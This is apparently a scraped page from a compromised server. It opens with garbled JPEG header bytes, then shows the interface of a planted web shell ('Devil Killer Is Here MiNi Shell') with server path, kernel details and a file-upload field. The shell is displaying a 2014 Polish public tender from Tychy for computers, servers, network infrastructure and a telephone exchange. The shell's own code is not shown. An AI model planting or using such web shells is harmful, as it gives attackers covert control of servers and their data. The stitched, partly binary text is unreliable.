JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140505/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140505/95957-N-2014.html

<p class="kh_header"><b>Tychy: Przetarg nieograniczony z możliwością składania ofert częściowych na:
Dostawę komputerów, dostawę i montaż serwerów i infrastruktury sieciowej.
Dostawa i montaż centrali telefonicznej.</b><br>
<b>Numer ogłoszenia: 95957 - 2014; data zamieszczenia: 05.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Międzygminne Przedsiębiorstwo Gospodarki Odpadami "Master" Sp. z o.o. , ul. Grota Roweckiego 44, 43-100 Tychy, woj. śląskie, tel. 032 2198427.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.master.tychy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Przedsiębiorstwo Międzygminne.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony z możliwością składania ofert częściowych na:
Dostawę komputerów, dostawę i montaż serwerów i infrastruktury sieciowej.
Dostawa i montaż centrali telefonicznej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I część zamówienia:

 Przedmiotem zamówienia jest dostawa fabrycznie nowych komputerów:
A. Komputer przenośny 15,6
 Dostawa, ilość: 5 sztuk
B. Stacja Dokująca 
Dostawa, ilość: 3 sztuki
C. Komputer przenośny 14
Dostawa, ilość: 3 sztuki
D. Stacja Dokująca 
Dostawa, ilość: 3 sztuki
E. Jednostka centralna - komputer stacjonarny  
Dostawa ilość: 2 sztuki
F. Monitor 21 - 23
Dostawa, ilość: 4 sztuki
G. Oprogramowanie - pakiet biurowy
Dostawa, ilość: 10 sztuk
H. Oprogramowanie - serwerowy system operacyjny
Dostawa i instalacja, ilość: 2 sztuki
	
I. Oprogramowanie - serwerowe licencje dostępowe 
Dostawa i instalacja, ilość: 50 sztuk
J. Oprogramowanie - system do wirtualizacji 
Dostawa i instalacja, ilość: 1 sztuka

K. Serwer  
Dostawa i montaż, ilość: 2 sztuki
L. Macierz dyskowa
Dostawa i montaż,  ilość: 1 sztuka
M. Przełącznik KVM i konsola
Dostawa i montaż,  ilość: 1 sztuka
N. Przełącznik rdzeniowy 
Dostawa i montaż, ilość: 1 sztuka
O. Przełącznik dostępowy  
Dostawa i montaż, ilość: 2 sztuki
P. Rozwiązanie typu Firewall działające w klastrze
Dostawa i montaż, ilość: 1 zestaw
R. Szafa krosowa
Dostawa i montaż, ilość: 1 sztuka
S. Listwa zasilająca
Dostawa i montaż, ilość: 2 sztuki

T. Patch panel
Dostawa i montaż ilość: 3 sztuki
U. Organizer kabli 
Dostawa i montaż ilość: 4 sztuki
W. Zasilacz awaryjny - UPS 
Dostawa i montaż ilość: 1 sztuka 
U. Kable krosowe
Dostawa i montaż, ilości:

50 szt. - patchcord miedziany RJ45 - RJ45 kat. 6 UTP, 2mb 
50 szt. - patchcord miedziany RJ45 - RJ45 kat. 6 UTP, 1mb
24 szt. - patchcord miedziany RJ45 - RJ45 kat. 6 UTP, 0,5mb
Opis dostawy i montażu

1.Wdrożenie dostarczonej infrastruktury zostanie przeprowadzone przez osoby posiadające stosowne certyfikaty i uprawnienia:
a. Co najmniej jeden ważny certyfikat producenta z zakresu znajomości instalacji i konfiguracji technologii wirtualizacji zaoferowanego rozwiązania,
b. Co najmniej jeden ważny certyfikat z zakresu znajomości rodziny serwerowych systemów operacyjnych
oferowanego producenta.
c. Co najmniej jeden ważny certyfikat producenta z zakresu znajomości instalacji i konfiguracji systemu bezpieczeństwa zaoferowanego rozwiązania

Wymagane jest dołączenie do oferty kopii wyżej wymienionych dokumentów potwierdzonych za zgodność z oryginałem. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia nie spełnia, na podstawie złożonych dokumentów. 

2.W ciągu 7 dni od podpisania umowy należy dostarczyć projekt wykonawczy który ma zawierać co najmniej:

W zakresie dostarczonego systemu bezpieczeństwa
Wykonania szczegółowego audytu obecnej topologii sieci oraz użytych mechanizmów sieciowych pod kątem wybrania optymalnej topologii docelowej,
Wykonania kompleksowego audytu konfiguracji i działania obecnie posiadanych urządzeń sieciowych. W zakresie filtracji ruchu należy założyć, że obecna polityka bezpieczeństwa jest uboga i musi być zbudowana praktycznie od nowa,
Analizy utylizacji używanych obecnie łącz oraz przepływu danych w sieci pod kątem aktywnego wykorzystania przez poszczególne usługi biznesowe,
Analizy wymogów bezpieczeństwa w firmie pod kątem przyszłej polityki bezpieczeństwa włącznie z wywiadem środowiskowym w celu uzupełnienia wiedzy i analizą działania w aplikacji w celu określenia używanych portów TPC/UDP,
Przygotowania koncepcji zmian w topologii, jeśli takie będą wymagane, do osiągnięcia optymalnej pod względem szybkości działania i niezawodności topologii docelowej,
Przygotowania koncepcji wdrożenia rozwiązania pracującego w klastrze uwzględniając aspekt współpracy/integracji z sąsiednimi systemami i urządzeniami (typu przełączniki rdzeniowe, Active Directory) oraz przedstawione przez Zamawiającego wymagania. Koncepcja wdrożenia poza tradycyjnymi elementami typu reguły filtracji oraz translacji powinna obejmować: Szczegółowe wdrożenie wszystkich obsługiwanych przez firewall funkcji UTM, tunele VPN (typu IPSec oraz SSL), jak również identyfikację użytkowników z wykorzystaniem kont w Active Directory oraz inteligentne balansowanie obciążenia łącz do Internetu,
Wdrożenia rozwiązania pracującego układzie redundantnym High Availability z uwzględnieniem wszystkich przedstawionych wymagań i zaakceptowanej przez Zamawiającego koncepcji,
Wykonanie rekonfiguracji innych urządzeń i systemów w sieci w celu poprawnej współpracy z firewallami (uruchomienie agregacji portów LACP, rekonfiguracja STP, integracja z AD itp). 
Wykonanie gruntownych testów niezawodności i odporności na różne awarie i scenariusze zdarzeń (awaria dowolnego linku, urządzenia, brak zasilania, zapętlenie ruchu w switchu w dowolnej strefie, awaria jednego z firewalli, awaria dowolnego portu w firewallu, awaria jednego z łącz do Internetu),

W zakresie macierzy, serwerów, sieci LAN, szafy krosowniczej i UPS-a
Aktualizacja oprogramowania urządzeń do najnowszej wersji stabilnej, zalecanej przez producenta,
Konfiguracja wstępna z uwzględnieniem podstawowej konfiguracji środowiska zarządzania: adresacja IP, zapewnienie zdalnego dostępu do interfejsów zarządzania,
Instalacja szafy dystrybucyjnej wraz z osprzętem,
Instalacja urządzeń w szafie dystrybucyjnej, podłączenie okablowania i uruchomienie komunikacji w sieci LAN,
Konfiguracja środowiska zarządzania w szczególności: ustawienie wszystkich parametrów związanych z adresacją i routingiem IP, ograniczenie zdalnego dostępu do urządzeń, konfiguracja autentykacji użytkowników z wykorzystaniem protokołu Radius i wskazanego przez Administratora serwera autentykacji, zapewnienie możliwości zarządzania poprzez protokoły SSH i HTTPS, instalacja oprogramowania do zarządzania urządzeniami na stacjach zarządzających,
Konfiguracja wirtualnych sieci lokalnych (VLAN) i protokołów niezbędnych do automatycznej wymiany informacji o VLAN ach wraz z zabezpieczeniami na poziomie hasła,
Ustawienie filtracji ruchu za pomocą list kontrolnych ACL, zgodnie z przygotowana wcześniej polityką bezpieczeństwa. 
Konfiguracja protokołu STP (Spanning Tree Protocol) z uwzględnieniem osobnych instancji dla każdej wirtualnej sieci lokalnej VLAN lub grup VLAN ów z osobna,
Optymalizacja protokołu STP oraz czasów zbieżności sieci w przypadku awarii jednego z redundantnych linków lub wystąpienia pętli,
Zabezpieczenie urządzeń przed atakami typu MAC Flooding.
Konfiguracja zabezpieczeń protokołu DHCP przed nieautoryzowanym wpięciem serwerów DHCP,
Konfiguracja obsługi ruchu typu multicast (IGMP Snooping),
Konfiguracja Private VLAN na potrzeby sieci kopii zapasowych,
Agregacja wskazanych linków na potrzeby połączeń z serwerami (Ether Channel),
Testy poprawności konfiguracji,
Przygotowanie instrukcji wykonywania kopii konfiguracji urządzeń i odtwarzania w przypadku awarii.

W zakresie instalacji platformy wirtualizacyjnej 
Konfiguracja macierzy, wydzielenie zasobów na wirtualne serwery. 
Konfiguracja sieci LAN w infrastrukturze wirtualnej . 
Instalacja i konfiguracja platformy do zarządzania maszynami wirtualnymi. 
Konfiguracja klastra wysokiej dostępności. 
Testy wydajności, optymalizacja. 

Projekt powinien być podpisany przez osobę/by posiadającą minimum 5 letnie doświadczenie w projektowaniu i wdrażaniu podobnych rozwiązań i posiadające stosowne certyfikaty i uprawnienia jak w pkt 1. 
Złożony projekt wykonawczy będzie zatwierdzany protokołem zdawczo - odbiorczym przez zamawiającego, w terminie 7 dni od daty złożenia kompletnego projektu do zamawiającego.
Dostawa, montaż i uruchomienie przedmiotu zamówienia wykonać w ciągu 30 dni od podpisania umowy na bazie zatwierdzonego projektu wykonawczego
Po zakończeniu prac montażowych wykonawca pisemnie zgłosi gotowość do odbioru i rozruchu przedmiotu zamówienia. Po podpisaniu protokołu odbioru przez obie stronny nastąpi 30 dniowy rozruch urządzeń. 
Wraz z pisemnym zgłoszeniem gotowość do odbioru i rozruchu wykonawca ma obowiązek dostarczenia dokumentacji zawierającej opis działania systemu bezpieczeństwa wraz z opisem topologii całej sieci po wprowadzonych zmianach. Dokumentacja musi zawierać w szczególności precyzyjne rysunki całej topologii sieci w ujęciu logicznym jak i fizycznym wraz z adresacją, opisem vlanów, sposobu działania poszczególnych połączeń (LACP, 802.1Q) oraz użytych w sieci mechanizmów. Schemat połączeń winien zostać dostarczony w formie drukowanej oraz w elektronicznym formacie edytowalnym (format .VSD - Visio).
Podczas rozruchu wykonawca ma  przeprowadzić szkolenia wskazanych osób w siedzibie Zamawiającego w zakresie całej instalacji a w szczególności z administracji systemem bezpieczeństwa, zwirtualizowanym środowiskiem, macierzą i przełącznikami sieci LAN.
Po stwierdzeniu poprawności wykonania, uruchomienia i konfiguracji całego zakresu zamówienia zostanie podpisany protokół końcowy odbioru.
II część zamówienia:
II część zamówienia:

A. Przedmiotem zamówienia jest dostawa i montaż nowej centrali telefonicznej:
Centrala telefoniczna

Dostawa i montaż ilość: 1 sztuka 

Dostarczenie, montaż i konfiguracja centrali telefonicznej wraz z telefonami i stacjami bazowymi (wykonanie niezbędnego okablowania jest po stronie Zamawiającego). 

 
Wraz z centralą zostaną dostarczone niezbędne komercyjne i dożywotnie licencje na aplikacje wspomagające pracę centrali w zakresie:
- komunikacji
- bilingu
- rejestracji rozmów
- konfiguracji
 
Na centralę zostanie udzielona gwarancja na okres minimum 36 miesięcy z naprawą na miejscu w przeciągu 4 godzin on momentu zgłoszenia usterki.

Wraz z centralą zostaną dostarczone:
- system DECT IP z 4 bazami oraz 40 szt. telefonów DECT,
- 1 szt. telefonu IP sekretarskiego współpracującego z dostarczoną centralą z dodatkową konsolą umożliwiająca zaprogramowanie min. 30 przycisków BLF z sygnalizacją zajętości,
- 15 szt. telefonów IP podstawowych współpracujących z dostarczoną centralą z obsługą słuchawek nagłownych,
- 3 szt. słuchawek nagłownych na jedne ucho współpracujące z dostarczonymi telefonami systemowymi
- konfiguracja centrali umożliwiająca realizację połączeń ze wszystkich dostarczonych aparatów

System bezprzewodowy DECT
Bezprzewodowy system komunikacyjny
Zakres funkcjonalny systemu:
a)	Zapewnienie komunikacji wewnętrznej głosowej i dla użytkowników telefonów bezprzewodowych w obrębie zasięgu działania stacji bazowych;
b)	Zapewnienie przenoszenia aktywnych połączeń głosowych pomiędzy stacjami bazowymi (funkcja handover);
c)	Zarządzanie telefonami bezprzewodowymi przez administratora systemu obejmujące:
aktualizację oprogramowania telefonów;
włączenie/wyłączenie dostępu do menu telefonu;
wgrywanie/zmianę profilu telefonu;
przypisywanie wybranych funkcji do klawiszy funkcyjnych telefonu.
d)	Obsługa wiadomości przywoławczych/interaktywnych obejmująca:
e)	Możliwość rozbudowy o minimum 500 telefonów bezprzewodowych oraz 50 stacji bazowych;
f)	Zapewnienie wewnętrznej komunikacji dla użytkowników telefonów bezprzewodowych w przypadku niedostępności (awarii) centrali telefonicznej.
 

Telefon sekretarski:
Graficzny wyświetlacz LCD o rozdzielczości 132x64 pikseli. 
Lokalna książka telefoniczna o pamięci 1000 wpisów.
Wsparcie dla zdalnych książek telefonicznych w formacie XML/LDAP.
Przeglądarka XML
Action URL&action URI
Open VPN
Switch z 2 portami 10/100 Ethenet, zintegrowane PoE
13 programowalnych klawiszy
Możliwość rozbudowy o moduły sekretarskie (maksymalnie 6)
Możliwość podłączenia maksymalnie dwóch modułów bez dodatkowego zasilacza
Możliwość monitorowania 238 linii przy wykorzystaniu modułów (BLF)
Telefon podstawowy:
Graficzny wyświetlacz LCD o rozdzielczości 132x64 pikseli. 
Lokalna książka telefoniczna o pamięci 1000 wpisów.
Wsparcie dla zdalnych książek telefonicznych w formacie XML/LDAP.
Przeglądarka XML
Action URL&action URI
Switch z 2 portami 10/100 Ethenet, zintegrowane PoE
Open VPN
Możliwość montażu naściennego.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa 
w art. 67 ust. 1 pkt 6 u.p.z.p.:
Zamawiający przewiduje udzielenie zamówień uzupełniających do 20 %wartości zamówienia podstawowego polegających na:
dostawie dodatkowych urządzeń przenośnych w przypadku zatrudnienia dodatkowych pracowników.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.21.31.00-6, 32.55.12.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Dotyczy I części zamówienia:
1.  Wadium należy wnieść w wysokości 2000,00 zł (słownie: dwa tysiące złotych 00/100) w terminie do 14 maja 2014 r. do godz. 10:00.  Decyduje data wpływu środków do Zamawiającego. 
2.  Wadium może być wnoszone:
a) w pieniądzu - przelewem na konto w Banku Ochrony Środowiska
                                                                 Nr: 66154011282001704349770004
b)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej (z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym), Gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2) ustawy z dnia 9 listopada 2000r.o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
c) Wadium może być wniesione w jednej lub kilku formach.
3) W przypadku, gdy wykonawca wnosi wadium w formie gwarancji bankowej lub gwarancji
ubezpieczeniowej z treści tych gwarancji musi w szczególności jednoznacznie wynikać:
a) zobowiązanie gwaranta (banku, zakładu ubezpieczeń) do zapłaty całej kwoty wadium nieodwołalnie i bezwarunkowo na pierwsze żądanie zamawiającego (beneficjenta gwarancji) zawierające oświadczenie, że zaistniały okoliczności, o których mowa w pkt 7 bez potwierdzania tych okoliczności,
b) termin obowiązywania gwarancji, który nie może być krótszy niż termin związania ofertą,
c) miejsce i termin zwrotu gwarancji.
d) Wadium wniesione w pieniądzu zamawiający przechowa na rachunku bankowym.
e) Wykonawca, który nie zabezpieczy swojej oferty akceptowaną formą wadium zostanie przez zamawiającego wykluczony, a jego oferta odrzucona.
4) Zamawiający zatrzymuje wadium wraz z odsetkami w sytuacji, gdy:
a) wykonawca, którego oferta została wybrana:
- odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
- nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
- spowodował, że zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po jego stronie,
5) wykonawca w odpowiedzi na wezwanie, o którym mowa w Rozdziale V pkt 5 niniejszej
SIWZ, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw. Zamawiający zwróci wadium jeśli wykonawca udowodni, że nastąpiło to z przyczyn nie leżących po jego stronie.
6) Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza.
7) Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
8) Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę
przed upływem terminu składania ofert.
9) Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono
wadium w wyniku ostatecznego rozstrzygnięcia odwołania, a jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego.
10) Na wniosek wykonawcy, którego oferta zostanie uznana za najkorzystniejszą zamawiający zaliczy wadium wpłacone w pieniądzu na poczet zabezpieczenia należytego wykonania umowy.
11) Jeżeli wadium zostanie wniesione w pieniądzu zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane pomniejszonym o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek wykonawcy.
12) W ofercie należy wpisać nr konta, na które zamawiający ma zwrócić wadium lub dołączyć do oferty upoważnienie do odbioru wadium przez wskazaną osobę.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje oceny spełnienia warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W przypadku I części Zamówienia:
Wykonawca zobowiązany jest wykazać się należytym wykonaniem minimum 3 dostaw (a w przypadku świadczeń okresowych lub ciągłych również wykonywaniem) w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Usługi muszą odpowiadać swoim rodzajem przedmiotowi zamówienia o wartości co najmniej 150.000,00 PLN netto - każda. 
Przez dostawy odpowiadające swoim rodzajem przedmiotowi zamówienia należy rozumieć wdrożenie serwerów i infrastruktury sieciowej.
Opis sposobu dokonywania oceny spełniania warunku:
W celu wykazania spełniania warunku wykonawca przedłoży: 
- wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, 3 głównych dostaw, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, zakresu, dat wykonania
1)	 podmiotów, na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie - (Wzór wykazu stanowi załącznik nr 3 do SIWZ).
2) dowodami, o których mowa są:
A)  poświadczenia, (z tym że w odniesieniu do nadal wykonywanych dostaw okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert);
B) oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze  wykonawca  nie  jest  w  stanie  uzyskać  poświadczenia, o który mowa w pkt A ).
W przypadku II części Zamówienia:
Wykonawca zobowiązany jest wykazać się należytym wykonaniem minimum 3 dostaw (a w przypadku świadczeń okresowych lub ciągłych również wykonywaniem) w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Usługi muszą odpowiadać swoim rodzajem przedmiotowi zamówienia o wartości co najmniej 30.000,00 PLN netto - każda. 
Przez dostawy odpowiadające swoim rodzajem przedmiotowi zamówienia należy rozumieć dostawę centrali telefonicznej wraz z wdrożeniem.  
Opis sposobu dokonywania oceny spełniania warunku:
A) W celu wykazania spełniania warunku wykonawca przedłoży: 
- wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, 3 głównych dostaw, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, zakresu, dat wykonania
2)	podmiotów, na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie - (Wzór wykazu stanowi załącznik nr 3 do SIWZ).
3) dowodami, o których mowa są:
A)  poświadczenia, (z tym że w odniesieniu do nadal wykonywanych dostaw okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert);
B) oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze  wykonawca  nie  jest  w  stanie  uzyskać  poświadczenia, o którym mowa w pkt A ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje oceny spełnienia warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>I część
A) warunek zostanie uznany za spełniony jeżeli wykonawca wykaże, iż jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż 
100.000,00 zł. 
II część
warunek zostanie uznany za spełniony jeżeli wykonawca wykaże, iż jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż 
40.000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

